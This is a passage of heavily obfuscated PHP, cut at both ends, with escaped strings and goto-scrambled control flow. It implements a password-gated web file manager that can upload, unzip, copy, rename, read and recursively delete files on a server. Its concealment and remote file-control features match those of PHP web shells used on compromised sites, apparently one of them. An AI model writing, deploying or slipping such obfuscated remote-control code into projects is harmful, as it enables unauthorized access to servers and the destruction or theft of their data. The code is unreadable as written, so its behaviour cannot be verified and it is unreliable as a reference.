"\51\73\x20\162\145\164\x75\x72\x6e\x20\146\x61\154\163\145\x3b\x22\x20\150\162\145\146\x3d\42\x23\x22\76\74\x73\160\141\156\x20\143\x6c\x61\163\x73\x3d\42\x52\145\155\157\166\145\x49\x63\x6f\x6e\x22\76\x3c\x2f\x73\160\x61\x6e\76\74\57\x61\76\x20"; goto Xkrir; hOy2N: return "\55\55"; goto pTX2U; NmcSx: $nY7pD .= "\74\141\x20\144\141\164\141\55\164\x6f\147\x67\x6c\145\75\x22\164\157\157\x6c\x74\151\160\x22\40\164\151\164\154\145\x3d\42" . $W7YOX[3] . "\42\x20\x6f\x6e\x63\x6c\151\143\153\75\42\123\145\164\123\x68\x6f\167\106\151\x6c\x65\115\157\144\x61\154\141\164\164\162\x28" . "\47" . $Lfznb . "\x2f" . $f4vjY . "\x27" . "\x29\73\x20\162\145\x74\165\x72\x6e\40\146\x61\x6c\163\145\73\x22\x20\150\x72\x65\146\x3d\42\x23\42\x3e\74\163\x70\141\156\40\x63\154\x61\x73\163\75\x22\123\150\x6f\167\111\143\157\156\42\x3e\x3c\57\x73\x70\141\156\76\x3c\57\141\x3e\x20"; goto jk2kk; sAsTj: wT6di: goto pci9F; VSJ8P: GADCL: goto qwkrW; Wn2va: unset($c5XOl); goto rC0BP; i6qFV: } goto hyll5; GFr7S: unset($x6_fq); goto BLL_b; qKyXY: echo "\40\72\40\74\x63\x6f\144\x65\40\x69\144\75\42\122\x65\156\x61\155\145\x66\151\x6c\145\116\141\x6d\145\42\x3e\x3c\57\x63\x6f\x64\x65\76\x3c\57\x68\64\x3e\xd\xa\x20\x20\40\x20\x20\x20\74\x2f\144\151\166\76\xd\xa\40\40\x20\x20\40\x20\x3c\144\x69\166\40\143\154\141\163\163\75\x22\x6d\x6f\144\x61\154\x2d\x62\157\x64\171\x22\76\15\xa\x9\40\x20\40\40\74\x69\156\x70\x75\164\40\x69\x64\x3d\x22\162\145\156\141\155\145\x44\x69\162\x22\40\x74\x79\160\145\75\x22\150\151\x64\x64\145\156\42\x20\x3e\x9\15\xa\x9\x9\74\151\x6e\x70\x75\x74\40\x69\x64\x3d\x22\162\x65\x6e\x61\155\x65\x4f\x6c\x64\111\156\x70\x75\164\x22\40\164\171\x70\145\75\42\x68\151\x64\144\145\x6e\x22\40\76\11\15\xa\11\x9\15\xa\x20\x20\40\40\40\40\40\x20\74\151\156\160\x75\x74\x20\x74\x79\x70\x65\75\x22\x74\145\x78\164\x22\x20\x63\x6c\x61\x73\163\x3d\x22\146\157\x72\155\55\143\x6f\156\164\x72\157\154\42\40\151\144\x3d\42\x72\145\156\x61\x6d\145\111\x6e\160\x75\164\x22\76\15\xa\x20\40\x20\40\40\x20\74\57\x64\151\166\76\xd\xa\40\40\40\x20\40\x3c\x64\x69\166\40\143\x6c\141\163\x73\x3d\x22\x6d\x6f\144\x61\154\55\x66\157\157\x74\145\162\42\x3e\xd\12\11\x20\xd\12\x9\40\40\40\x20\74\163\x70\141\x6e\40\x69\144\75\42\x52\x65\x6e\x61\155\x65\114\141\x62\x65\154\x73\165\x63\x63\145\163\x73\x22\x20\x63\154\141\163\x73\75\42\x6c\141\x62\x65\x6c\x20\x6c\141\142\145\154\55\163\x75\x63\143\x65\163\163\x20\x70\x75\x6c\x6c\x2d"; goto R08I2; edmVV: echo $W7YOX[17]; goto H8LGv; jdcHv: echo "\74\57\x62\165\164\164\x6f\156\x3e\15\12\x20\x20\x20\40\x20\x20\x20\40\x3c\x62\165\164\164\157\x6e\40\164\171\x70\145\75\42\x62\165\164\164\x6f\156\x22\x20\143\x6c\141\163\163\x3d\42\x62\164\156\x20\x62\164\156\55\144\x65\146\x61\x75\x6c\164\42\40\144\141\164\x61\x2d\x64\x69\163\155\x69\x73\x73\75\x22\x6d\x6f\x64\141\154\42\x3e"; goto A8Qy5; gDRmd: echo $W7YOX[3]; goto eisQi; QvPLY: $mbVav = "\74\151\x6e\x70\165\x74\40\x6e\141\155\145\75\42\x75\163\x65\x72\156\141\x6d\145\42\x20\166\141\x6c\165\145\75\x22\x22\40\164\x79\x70\145\x3d\42\150\x69\x64\x64\x65\156\x22\x20\x3e"; goto DXD1A; Nztcp: $Ru0H7 = 1; goto IE9Tx; GiDH3: GEeKT: goto G931X; ixJCU: $r2sBB[0] = array_map("\163\x74\x72\164\x6f\154\157\167\145\x72", $r2sBB[0]); goto QyvFK; cDWtN: echo "\42\x3e\74\x2f\x73\160\141\156\76\40\15\xa\x20\x20\40\x20\40\40\x20\40\x20\40\x3c\142\x75\164\x74\157\156\x20\164\171\x70\x65\x3d\42\x62\165\x74\164\x6f\156\x22\40\x63\x6c\141\163\163\75\x22\142\x74\156\x20\142\164\156\55\163\165\x63\143\x65\x73\163\42\x20\x20\x69\144\75\x22\x46\151\x6c\x65\127\162\x69\164\145\x42\x74\156\42\40\x6f\x6e\x63\154\151\x63\x6b\x3d\x22\167\162\151\x74\145\x41\156\144\x43\x6f\156\164\x65\x6e\x74\50\51\42\40\x3e"; goto clANY; rtNRt: echo $fZ6Lt[8]; goto qucv4; kWyJz: function HVAJT() { goto ofvgB; jWIo3: Vs4fJ: goto U8l0a; whLnd: if (file_exists("\56\57\x63\163\x73\x2f\142\x6f\157\x74\163\164\x72\x61\160\56\x6d\x69\156\56\143\x73\x73")) { goto Vs4fJ; } goto sv2BU; BgFvC: $Yypaa .= "\x3c\154\x69\x6e\x6b\x20\x72\145\x6c\75\x22\x73\x74\x79\154\145\x73\150\x65\x65\x74\42\x20\x68\x72\x65\146\75\x22\57\57\143\144\156\56\162\141\167\147\x69\164\56\x63\x6f\x6d\x2f\x6d\157\x72\164\x65\x7a\141\x2f\142\x6f\x6f\x74\163\164\x72\x61\x70\55\x72\164\x6c\x2f\x76\x33\56\x33\56\64\x2f\x64\151\163\x74\x2f\x63\163\163\57\142\x6f\157\164\163\x74\162\x61\x70\55\x72\164\x6c\56\155\151\156\x2e\x63\163\x73\x22\x3e"; goto f2znC; nqbis: $Yypaa .= "\74\x73\143\x72\x69\160\164\40\x73\162\143\75\x22\x2e\x2f\x6a\163\57\x62\x6f\x6f\164\163\x74\x72\x61\x70\56\x6d\x69\x6e\x2e\152\x73\x22\76\x3c\57\x73\x63\x72\151\x70\164\x3e"; goto wn2B6; ofvgB: global $zaydo; goto Xc1A4; HtejH: Scs3z: goto G1urJ; f_9Ju: goto UVSyJ; goto jWIo3; WfEC5: $Yypaa .= "\74\163\143\x72\x69\160\x74\40\x73\x72\143\75\x22\57\x2f\x72\x61\x77\56\x67\x69\x74\x68\x75\x62\x75\x73\145\162\x63\157\156\164\x65\x6e\x74\56\143\x6f\x6d\x2f\145\x73\x69\x6d\x61\x6b\151\x6e\x2f\164\167\142\163\55\x70\x61\147\x69\156\141\164\x69\157\x6e\x2f\144\x65\x76\x65\154\157\x70\x2f\152\x71\x75\x65\x72\171\56\164\167\x62\x73\120\141\147\151\156\x61\x74\x69\157\156\56\x6d\x69\156\56\152\163\x22\x3e\x3c\x2f\x73\143\x72\x69\160\164\76"; goto Un1wh; xmcNC: UFCYW: goto Vl4o3; G1urJ: $Yypaa .= "\74\154\151\156\x6b\40\150\162\x65\x66\75\42\56\57\x63\x73\163\57\x62\157\x6f\164\x73\164\162\141\x70\55\162\164\154\56\x6d\x69\x6e\x2e\x63\x73\163\42\40\162\x65\x6c\x3d\x22\163\x74\171\x6c\145\x73\x68\145\145\164\x22\x3e"; goto pNgzs; poeLx: if (file_exists("\56\x2f\x6a\x73\57\x6a\x71\165\145\x72\171\55\x32\x2e\62\56\60\56\x6d\x69\x6e\x2e\x6a\163")) { goto CthZs; } goto N9qmq; a9LOp: if (file_exists("\56\57\x6a\x73\x2f\152\x71\x75\x65\162\x79\x2e\164\167\x62\x73\x50\141\147\x69\156\141\164\151\157\156\x2e\x6d\151\x6e\56\x6a\x73")) { goto dPxvV; } goto WfEC5; GdG3K: if (file_exists("\x2e\x2f\152\x73\57\142\x6f\157\x74\x73\x74\162\x61\160\x2e\155\151\x6e\56\x6a\x73")) { goto TzUma; } goto zQDYT; X4ua4: dPxvV: goto a0Jx6; pfWik: CthZs: goto f3s3m; sv2BU: $Yypaa .= "\74\154\151\x6e\x6b\40\162\145\154\x3d\42\x73\x74\171\154\x65\163\x68\145\145\164\42\x20\150\162\145\146\x3d\x22\x2f\57\155\x61\x78\x63\144\156\x2e\142\157\157\x74\x73\x74\162\141\160\143\x64\x6e\56\x63\157\x6d\x2f\142\157\157\164\x73\164\162\141\x70\57\63\x2e\x33\56\66\57\x63\x73\x73\57\x62\x6f\x6f\164\x73\164\x72\141\x70\56\155\x69\156\x2e\x63\163\x73\42\76"; goto f_9Ju; zQDYT: $Yypaa .= "\x3c\163\143\162\151\x70\164\x20\163\162\143\x3d\42\x2f\x2f\155\141\170\143\144\156\56\x62\x6f\x6f\x74\x73\x74\x72\x61\160\143\144\x6e\x2e\x63\x6f\155\x2f\x62\157\157\164\163\x74\162\141\160\x2f\x33\x2e\x33\x2e\66\57\x6a\x73\57\x62\x6f\x6f\164\x73\164\x72\x61\160\x2e\155\x69\156\x2e\152\x73\42\x3e\x3c\x2f\163\143\162\x69\x70\x74\76"; goto O8q9E; ynDYu: UVSyJ: goto poeLx; Xc1A4: $Yypaa = ''; goto whLnd; a_mAq: return $Yypaa; goto CZTpH; pNgzs: cfKk7: goto ADkVy; U8l0a: $Yypaa .= "\x3c\154\151\156\153\40\x68\162\x65\146\x3d\x22\x2e\57\143\163\163\x2f\x62\157\157\164\x73\x74\162\141\160\x2e\x6d\x69\x6e\x2e\x63\163\x73\42\x20\x72\145\154\x3d\42\163\x74\171\154\x65\x73\150\x65\x65\x74\42\76"; goto ynDYu; Un1wh: goto UFCYW; goto X4ua4; Vl4o3: if (!$zaydo) { goto eeciF; } goto oAQ9j; ADkVy: eeciF: goto a_mAq; N9qmq: $Yypaa .= "\x3c\x73\x63\x72\x69\160\x74\40\163\162\x63\75\42\x2f\x2f\143\x6f\x64\145\56\x6a\161\165\145\x72\171\56\x63\157\x6d\57\x6a\161\x75\145\162\x79\55\62\56\62\x2e\x30\56\x6d\151\x6e\x2e\x6a\163\42\76\74\x2f\x73\143\162\x69\160\164\x3e"; goto kTrFi; a0Jx6: $Yypaa .= "\x3c\x73\143\x72\151\160\164\x20\x73\162\x63\75\42\x2e\x2f\x6a\163\57\152\161\x75\145\162\x79\x2e\164\167\142\163\120\x61\x67\x69\156\x61\164\x69\157\156\x2e\x6d\151\156\56\152\x73\x22\76\x3c\57\163\x63\162\151\x70\164\x3e"; goto xmcNC; wn2B6: Et2iR: goto a9LOp; f3s3m: $Yypaa .= "\74\163\143\162\x69\x70\x74\x20\x73\162\x63\75\42\56\57\152\163\x2f\x6a\161\x75\x65\162\x79\x2d\x32\x2e\x32\x2e\x30\x2e\x6d\x69\156\56\152\x73\42\x3e\x3c\57\163\x63\x72\x69\160\x74\x3e"; goto vNj2w; kTrFi: goto I21Jr; goto pfWik; f2znC: goto cfKk7; goto HtejH; vNj2w: I21Jr: goto GdG3K; II8l_: TzUma: goto nqbis; O8q9E: goto Et2iR; goto II8l_; oAQ9j: if (file_exists("\x2e\x2f\143\163\x73\57\142\x6f\157\x74\163\164\x72\141\160\55\162\164\154\56\x6d\151\156\56\x63\x73\163")) { goto Scs3z; } goto BgFvC; CZTpH: } goto qX6Qq; FW3FX: $x5bhU = 1; goto BHS2t; puzQT: echo $OQWkJ; goto MF4iS; IVLvt: echo $W7YOX[11]; goto vMNqp; RF0rE: if (!(isset($_GET["\x75\x6e\172\151\160"]) && KD9ya())) { goto ZeAoh; } goto hssgZ; VHrtv: unset($_REQUEST); goto w3SW5; FGMOT: unset($KjPGL); goto WIvF7; RUHTJ: unset($X_irx); goto c9Rpw; eg2Vv: if (!(!YyLni() && $TG6CH && (isset($_GET["\165\x70\x6c\157\x61\x64\146\x69\154\145"]) || isset($_GET["\x6c\151\163\164\x46\x6f\x6c\x64\145\x72\x46\151\154\145\x73"]) || isset($_GET["\143\x6f\x70\171"]) || isset($_GET["\x75\x6e\172\x69\x70"]) || isset($_GET["\x74\x61\x62\x6c\145"]) || isset($_GET["\162\x65\156\x61\x6d\145"]) || isset($_GET["\x52\145\x6d\x6f\x76\x65"]) || isset($_GET["\x72\x65\141\144"]) || isset($_GET["\156\145\x77\146\157\154\x64\145\x72"])))) { goto sLiut; } goto Vc_lf; WKGyk: goto CfySF; goto DIxId; juOCw: hzi9R(1); goto c5QU4; UUnTo: $PEjj0 = 1; goto eaeA7; gDTXf: $r2sBB[3] = array("\x6d\160\x33", "\x77\x61\x76", "\157\x67\147"); goto Q62pA; ZcIRI: echo $fZ6Lt[9]; goto RvZkF; Px_q8: unset($Ru0H7); goto bSsIs; aerzO: echo $W7YOX[14]; goto qeMxQ; MbNZx: $W7YOX[27] = "\x41\x62\157\x75\x74"; goto Dv7aZ; fjl_P: echo "\xe2\206\x92"; goto VPtym; cTxG1: echo $fZ6Lt[13]; goto gQIDJ; UCzw4: $Q9vLm = ''; goto xrzq8; VLmmI: if (!($_POST["\x75\x73\x65\162\156\x61\155\145"] == $Q9vLm && $_POST["\160\141\x73\x73\x77\x6f\x72\144"] == $X_irx)) { goto AcpST; } goto rpl1u; QJNy2: @c6AC0($_GET["\165\156\x7a\x69\x70"], $_GET["\x74\157"]); goto uVMXr; uRt8_: echo "\x20\72\x20\74\143\157\x64\x65\x20\x69\x64\x3d\42\x52\x65\x6d\x6f\166\x65\146\151\x6c\x65\116\x61\155\145\x22\x3e\x3c\x2f\143\x6f\144\x65\76\74\57\x68\64\x3e\15\xa\x20\40\x20\x20\40\40\74\x2f\144\151\x76\x3e\xd\12\40\40\x20\x20\40\x20\74\144\151\x76\40\x63\154\141\163\163\75\x22\x6d\157\x64\141\x6c\55\x62\157\x64\x79\x22\x3e\xd\xa\x9\40\40\x20\40\x3c\x69\x6e\160\x75\x74\x20\151\144\x3d\42\122\145\x6d\157\x76\145\x64\151\162\x22\x20\x74\x79\x70\x65\x3d\x22\150\151\x64\144\x65\156\x22\40\76\x9\15\xa\x9\11\74\151\x6e\x70\x75\164\40\x69\x64\75\x22\122\145\155\x6f\x76\x65\x49\x6e\160\165\x74\42\x20\164\171\x70\145\75\42\150\151\x64\144\145\156\x22\x20\76\x9\15\12\x9\11"; goto rGUKG; v4VT5: $W7YOX[10] = "\124\157\164\141\154\40\146\151\x6c\x65\163"; goto BtPgj; Aem4n: $PEjj0 = 0; goto riy37; PPFJc: $W7YOX[14] = "\123\x61\x76\145"; goto WuuAi; H1t7J: hzI9R(1); goto Q6Tta; CH3vw: echo "\x3c\x2f\x73\x70\x61\x6e\x3e\x3c\57\141\x3e\15\xa\x20\x20\x20\40\x3c\x2f\x64\151\x76\x3e\15\12\x20\x20\x20\40\40\xd\xa\11\x20\x20\15\12\11\40\x3c\144\x69\x76\40\x63\154\x61\x73\163\x3d\42\143\157\154\x6c\x61\x70\x73\x65\x20\x6e\x61\166\142\141\x72\x2d\143\157\154\x6c\141\x70\163\145\x20\x6e\141\x76\142\141\162\x2d\x65\170\x31\55\x63\x6f\x6c\154\x61\160\163\x65\42\x3e\x20\15\12\x9\40\x20\15\xa\x3c\165\154\x20\143\x6c\x61\163\163\75\42\x6e\141\x76\x20\x6e\x61\166\x62\x61\x72\x2d\x6e\141\166\x20\x6e\x61\x76\142\141\x72\55"; goto I4D4x; JLsoD: echo "\x3c\57\x61\76\74\57\154\151\76\xd\12\40\40\40\x20\x20\x20\x20\40\40\40\40\x20\74\154\151\x20\143\x6c\141\x73\163\x3d\x22\x22\76\x3c\x61\40\144\141\x74\x61\x2d\164\157\147\147\x6c\145\x3d\x22\x74\141\142\42\x20\x68\x72\x65\x66\x3d\42\x23\x5f\164\x72\x65\145\x22\x20\x69\x64\75\x22\110\162\x65\x66\x54\x72\145\145\x22\x3e"; goto VDwDD; D15Fy: echo $W7YOX[32]; goto xPTpT; H8LGv: echo "\47\x29\73\11\x9\xd\xa\x9\11\x9\x20\x20\40\144\x69\162\x20\75\40\x72\145\x70\154\141\143\x65\x5f\x64\x69\162\x28\x24\50\x27\43\106\162\x6f\155\x46\x6f\x6c\x64\x65\x72\x44\151\x72\x27\x29\x2e\166\141\x6c\x28\x29\51\x3b\40\15\12\11\x9\x9\40\x20\40\x24\56\147\145\x74\112\x53\117\116\50\42\x3f\x63\157\x70\171\75\42\x2b\144\x69\x72\53\x22\46\x74\x61\x62\x6c\x65\46\x74\x6f\x3d\42\x2b\x24\x28\47\x23\x54\157\106\157\154\x64\145\162\111\156\x70\165\164\47\51\x2e\166\x61\154\50\x29\54\40\146\165\156\x63\164\151\157\156\50\x64\x61\x74\x61\51\173\xd\12\x9\40\40\x20\x20\40\40\x20\40\x20\40\40\x24\x28\x22\x23\x63\x6f\156\x74\x65\x6e\x74\x22\51\x2e\150\x74\x6d\154\x28\x64\x61\x74\141\56\x74\x61\x62\154\x65\x29\x3b\15\xa\11\11\x9\40\40\40\x24\x28\x27\43\141\154\x65\x72\x74\47\51\x2e\150\164\155\x6c\x28\x64\141\x74\x61\56\141\x6c\145\x72\164\x29\73\x9\x9\xd\12\11\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\x24\50\47\43\x43\157\160\x79\106\x6f\154\x64\x65\162\x27\51\x2e\x6d\x6f\x64\x61\154\x28\47\x68\x69\x64\x65\47\x29\73\15\xa\40\40\x20\40\40\x20\40\40\x20\40\40\40\40\x20\x20\44\50\42\x23\124\157\106\157\154\x64\x65\x72\x49\x6e\160\165\164\42\51\x2e\162\x65\155\x6f\166\x65\x41\164\164\162\x28\42\x64\151\x73\x61\x62\154\145\x64\x22\x29\x3b\15\12\11\11\40\40\x20\x20\40\40\40\x24\x28\47\x23\x43\x6f\160\x79\114\x61\142\x65\154\163\165\143\x63\x65\163\163\x27\x29\x2e\x68\164\x6d\x6c\50\47\x27\51\73\15\12\11\11\x9\40\x20\40\44\x28\x27\43\x54\x6f\106\x6f\x6c\144\145\162\x49\156\160\x75\x74\47\x29\x2e\x76\141\154\x28\47\x27\51\x3b\xd\xa\11\x9\x9\40\x20\40\xd\xa\x9\x20\x20\40\40\x20\x20\40\x20\40\175\x29\73\11\xd\12\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\175\73\xd\12\11\11\11\x20\15\xa\11\11\x9\40\xd\12\x9\11\11\40\40\11\40\x66\165\x6e\x63\x74\x69\x6f\x6e\40\x7a\x69\160\x41\156\144\x43\x6f\156\x74\x65\x6e\164\50\51\40\xd\xa\11\x9\x9\x20\173\x20\xd\xa\xd\12\x9\11\11\40\40\44\x28\x22\x23\x5a\151\160\114\x6f\141\x64\x22\51\56\x68\164\x6d\x6c\x28\47\x3c\x63\145\156\164\x65\x72\x3e\x3c\x62\x72\x3e\x3c\142\162\76\x3c\x73\x70\141\156\40\143\154\141\163\163\75\x22\114\x6f\x61\x64\x69\156\147\x22\x3e\74\x2f\x73\x70\x61\x6e\x3e\x3c\142\x72\x3e\x3c\x62\162\x3e"; goto ULZpq; D1G5B: echo "\47" . implode("\47\x2c\47", $r2sBB[2]) . "\x27"; goto CFvyz; grrC0: function q6L_E($f4vjY) { goto n7ZB_; QNjhK: return $ofGyE; goto gkYpo; n7ZB_: global $W7YOX; goto HgcVm; HoBiD: Y2bjg: goto PDLX0; OGoCR: if ($ofGyE == '') { goto uMWUB; } goto QNjhK; gkYpo: goto UlPcv; goto fwGCo; udyla: return "\144\x69\162"; goto CoSqC; fwGCo: uMWUB: goto udyla; PDLX0: $ofGyE = strtolower(pathinfo($f4vjY, PATHINFO_EXTENSION)); goto OGoCR; CoSqC: UlPcv: goto KDq9w; gDL4w: return "\55\55"; goto HoBiD; HgcVm: if (!($f4vjY == "\115\x61\x74\143\150\x5f\156\157\164\x5f\x66\157\x75\x6e\144")) { goto Y2bjg; } goto gDL4w; KDq9w: } goto bE1Yl; AsNK_: $W7YOX[18] = "\x42\x72\157\x77\x73\x65\40\144\151\x72\145\143\x74\x6f\x72\x69\145"; goto pR5qP; ysbtZ: TJK48: goto k2_wC; Ihynv: $_SESSION["\154\157\x67\151\156"]["\x70\141\163\x73"] = $X_irx; goto YOuDH; uaxSz: function y82vl($jVo6H) { goto LY8fl; Z7fjW: header("\103\157\x6e\164\145\156\x74\x2d\x74\171\x70\x65\72\x20\x61\160\160\154\x69\143\141\x74\x69\157\156\x2f\152\x73\x6f\x6e\x3b\40\143\150\141\x72\163\x65\x74\x3d" . $OQWkJ); goto nhKVb; LY8fl: global $OQWkJ; goto Z7fjW; nhKVb: return json_encode($jVo6H); goto KNg_B; KNg_B: } goto PrdKo; dTax2: lTvvg: goto RF0rE; Q6Tta: echo "\x22\x3e\x3c\x2f\163\x70\x61\x6e\76\x20\xd\xa\11\40\x20\x20\40\x3c\142\x75\164\164\x6f\x6e\x20\x20\x74\171\160\x65\x3d\42\142\x75\x74\x74\x6f\x6e\x22\x20\x63\154\141\163\163\75\x22\x62\164\156\x20\x62\164\156\x2d\163\165\143\143\145\163\163\x22\40\x6f\156\143\154\151\143\153\75\42\172\151\x70\x41\156\x64\x43\157\x6e\x74\145\156\x74\50\51\42\76"; goto lOsm1; ULCry: bx5JM: goto qN9v6; w3SbH: function S7bMT($g7ThV, $sCvMJ) { goto qhYD2; ghXZA: if (!($Y_zNc == "\56" || $Y_zNc == "\x2e\56")) { goto jTfnk; } goto LyDxB; qhYD2: if (!(is_file($g7ThV) === true)) { goto MxG81; } goto gauYr; DTJJR: MxG81: goto fHTpJ; qNvNp: h02eH: goto gVxl6; acXqx: if (!$sCvMJ) { goto V0jCh; } goto VLeNv; fHTpJ: if ($s5SMq = @opendir($g7ThV)) { goto hzFOj; } goto sp8Aa; in407: hzFOj: goto Oyn6w; gauYr: return @unlink($g7ThV); goto DTJJR; Gb4Dz: if (!(false !== ($Y_zNc = readdir($s5SMq)))) { goto Xizpi; } goto ghXZA; OxL0K: closedir($s5SMq); goto acXqx; sp8Aa: return; goto in407; QDBLi: V0jCh: goto oPTxh; gVxl6: goto hFnjK; goto KVou6; KVou6: Xizpi: goto OxL0K; VLeNv: @rmdir($g7ThV); goto QDBLi; Hw_e1: if (@unlink($g7ThV . "\57" . $Y_zNc)) { goto h02eH; } goto XCHJP; XCHJP: S7BMt($g7ThV . "\x2f" . $Y_zNc, true); goto qNvNp; oPTxh: return; goto ootAs; LyDxB: goto hFnjK; goto mKbkU; Oyn6w: hFnjK: goto Gb4Dz; mKbkU: jTfnk: goto Hw_e1; ootAs: } goto AZjB2; vaZTU: $W7YOX[33] = "\x45\162\x72\157\x72"; goto psXtx; YjmSt: goto rG7h1; goto R2ajM; sCFQe: if (!(count($r2sBB[1]) != 0)) { goto Rq0lb; } goto KWey8; yqYq_: unset($_FILES); goto u3NM7; elyGn: echo $W7YOX[33]; goto SphgU; kDIM5: $W7YOX[23] = "\114\x6f\147\x69\156"; goto gspzK; EsEun: echo $W7YOX[18]; goto JLsoD; NwqdJ: echo "\x3c\x2f\x63\x65\156\164\145\x72\x3e\47\51\73\xd\12\x9\11\x9\x20\x20\40\x24\50\42\43\x46\157\x6c\144\x65\162\x55\156\172\151\160\111\x6e\160\165\164\x22\51\x2e\141\164\x74\x72\x28\x22\144\x69\x73\141\142\154\145\x64\x22\x2c\x20\x22\144\x69\163\141\x62\154\145\x64\x22\x29\73\15\12\11\x9\11\x20\x20\40\44\50\47\43\x5a\x69\160\114\x61\142\x65\x6c\163\x75\143\143\145\163\x73\47\51\x2e\150\164\x6d\154\x28\47"; goto btZ4a; oeref: $r2sBB[0] = array(); goto iIKRu; iMqhG: @session_start(); goto g92Hx; Va1oN: goto apuN2; goto eNDgN; Tdf3P: echo "\42\76\74\57\163\x70\x61\156\x3e\x20\xd\12\x9\x20\40\x20\x20\74\142\x75\164\164\157\156\40\40\x74\x79\x70\145\x3d\x22\x62\165\x74\x74\157\156\42\x20\143\x6c\141\x73\163\75\x22\142\164\x6e\40\x62\x74\x6e\55\x73\165\143\143\145\x73\163\42\x20\x20\157\x6e\x63\154\151\143\x6b\75\42\143\x6f\x70\171\101\x6e\144\x43\x6f\x6e\164\145\x6e\164\x28\x29\x22\76"; goto W4r_V; tlXWr: JyE45: goto xTWul; Ia0B5: if ($zaydo) { goto d30iw; } goto A7wU3; jAP1W: echo "\40\x20\xd\12\x9\11\x3c\154\x69\x6e\x6b\x20\150\x72\145\146\75\x22"; goto G22F3; Rb11s: $fZ6Lt[12] = "\x64\141\x74\141\72\x69\155\141\147\145\57\160\156\147\73\x62\141\x73\x65\x36\x34\x2c\151\x56\x42\x4f\x52\x77\x30\x4b\107\x67\157\101\101\x41\x41\116\x53\x55\150\105\x55\147\x41\101\101\x42\101\101\x41\x41\x41\121\x43\x41\x59\x41\101\x41\x41\146\70\57\x39\150\101\101\x41\101\171\x55\154\x45\121\x56\121\x34\x6a\x62\x58\x53\x50\125\x74\x44\115\x51\x43\106\x34\145\x64\x4b\153\122\x61\x48\x44\166\60\x59\x42\x48\x47\130\x44\x69\160\111\160\126\103\64\102\126\x65\154\x36\103\71\x51\x6b\x4e\x71\x70\x43\102\132\x45\x48\x48\122\x6f\x36\126\x41\x51\57\x63\x55\117\x6a\130\113\x56\131\110\115\114\x48\x73\x6a\x79\112\x75\144\116\123\x4d\111\x2f\160\157\111\152\x6e\107\103\67\142\120\x6b\x55\142\67\152\x45\117\x5a\x62\111\125\70\163\x4e\x4c\112\104\x39\64\161\57\x59\x54\122\x48\x63\131\x6a\x2f\103\155\67\x68\120\105\x62\170\x45\144\151\53\145\x49\x6b\x6d\167\171\144\x78\x33\x70\161\150\110\145\102\130\120\113\x59\x49\x44\x6a\x43\x50\70\107\163\x66\162\x79\150\x6e\62\x63\111\x63\122\x64\154\104\x44\x44\x53\x5a\127\162\x78\x43\x39\x6e\x77\x77\120\x6d\x4f\x4d\x71\163\101\64\145\70\x59\x54\104\167\103\64\x77\103\62\165\x33\151\x6f\113\x75\61\141\144\x4a\172\122\x43\71\111\163\x67\x78\x4b\103\110\157\64\x36\167\x49\x32\x76\x67\111\x6b\156\172\x4e\107\117\101\x39\144\110\66\x6b\x6c\126\104\x2b\x47\161\60\x53\x70\57\x30\x37\156\65\x59\71\106\63\126\x6b\x47\x73\111\x4c\101\101\x41\x41\101\105\154\106\x54\x6b\123\165\x51\x6d\x43\x43"; goto HBHPN; IJHRS: echo "\x29\40\x6e\x6f\x2d\162\145\160\145\x61\x74\40\154\x65\x66\x74\x20\143\145\x6e\164\x65\162\73\x70\141\144\144\151\156\147\72\x20\x35\160\170\x20\x30\x20\x35\x70\170\x20\62\65\x70\170\x3b\155\141\x72\x67\151\156\55\154\145\x66\164\72\40\65\160\170\x3b\175\15\xa\x2e\114\x6f\x67\157\165\164\111\x63\157\156\173\142\141\143\x6b\x67\x72\157\165\156\x64\72\165\162\x6c\50\x20\x20"; goto cTxG1; G9yjK: echo "\x5d\x3b\x20\15\xa\x20\166\x61\x72\40\111\x6d\x67\x54\171\160\145\163\x20\x3d\x20\133\x20"; goto Trl2J; kMAz1: unset($_POST); goto yqYq_; xAzhV: echo $W7YOX[15]; goto rIlek; MF4iS: echo "\42\76\15\xa\x9\x9\74\x6d\x65\164\x61\x20\156\141\x6d\x65\x3d\42\166\x69\145\167\x70\157\162\x74\x22\40\143\157\156\164\145\x6e\x74\75\42\x77\151\x64\164\x68\75\144\145\x76\151\x63\145\x2d\167\x69\x64\164\x68\54\x20\151\x6e\x69\164\151\x61\154\55\x73\143\141\154\145\x3d\x31\42\x3e\15\12\11\11\74\x6d\145\x74\141\40\150\x74\164\160\x2d\145\161\x75\x69\166\75\42\130\x2d\x55\101\55\103\157\155\160\141\164\x69\x62\154\145\42\40\x63\157\x6e\x74\145\x6e\x74\x3d\x22\x49\105\75\145\x64\147\145\x22\x3e\15\12\11\40\x20\x20\40"; goto IBMtR; wz5hX: echo $fZ6Lt[4]; goto KtfQx; dKjsa: echo $W7YOX[14]; goto jdcHv; psXtx: $W7YOX[34] = "\123\x75\143\143\x65\x73\163"; goto q0sPK; r3X_T: echo "\x3c\x2f\143\145\x6e\x74\x65\x72\x3e\x3c\57\x64\x69\166\76\47\73\xd\12\x20\40\40\x20\40\40\40\40\40\40\x20\x20\44\50\146\x75\x6e\143\x74\x69\157\x6e\50\x29\173\x24\50\x27\142\157\144\x79\x27\x29\x2e\164\x6f\x6f\154\164\x69\x70\x28\173\x20\x73\x65\154\x65\143\x74\157\162\72\x20\x27\133\144\x61\x74\x61\x2d\164\157\x67\147\154\x65\x3d\x22\x74\x6f\x6f\x6c\164\x69\x70\42\135\x27\x20\x7d\x29\x3b\175\x29\73\15\12\x9\11\11\15\12\11\x9\x9\x9\x9\44\50\144\x6f\x63\x75\x6d\145\156\164\x29\56\157\x6e\x28\47\x63\x68\x61\156\x67\145\x27\54\40\47\56\x62\164\x6e\55\146\x69\x6c\x65\40\72\146\x69\154\145\x27\54\40\146\x75\156\143\164\151\x6f\156\50\x29\x20\x7b\15\xa\x9\11\11\11\11\x9\x76\141\x72\x20\151\x6e\x70\165\164\40\75\x20\44\x28\x74\150\x69\x73\51\54\15\xa\x9\x9\x9\x9\x9\11\156\165\155\x46\151\x6c\145\163\x20\x3d\x20\x69\156\x70\165\164\56\147\x65\x74\x28\x30\x29\56\146\x69\154\145\163\40\77\40\x69\156\160\x75\164\56\x67\x65\164\x28\60\51\x2e\x66\151\x6c\x65\163\x2e\154\145\156\x67\164\150\40\x3a\x20\61\54\15\12\x9\x9\11\11\x9\11\154\141\x62\x65\x6c\40\75\40\x69\x6e\160\165\x74\x2e\x76\141\154\50\51\56\x72\x65\x70\x6c\x61\x63\145\x28\x2f\x5c\x5c\57\x67\x2c\40\47\x2f\47\51\x2e\162\x65\160\x6c\x61\x63\x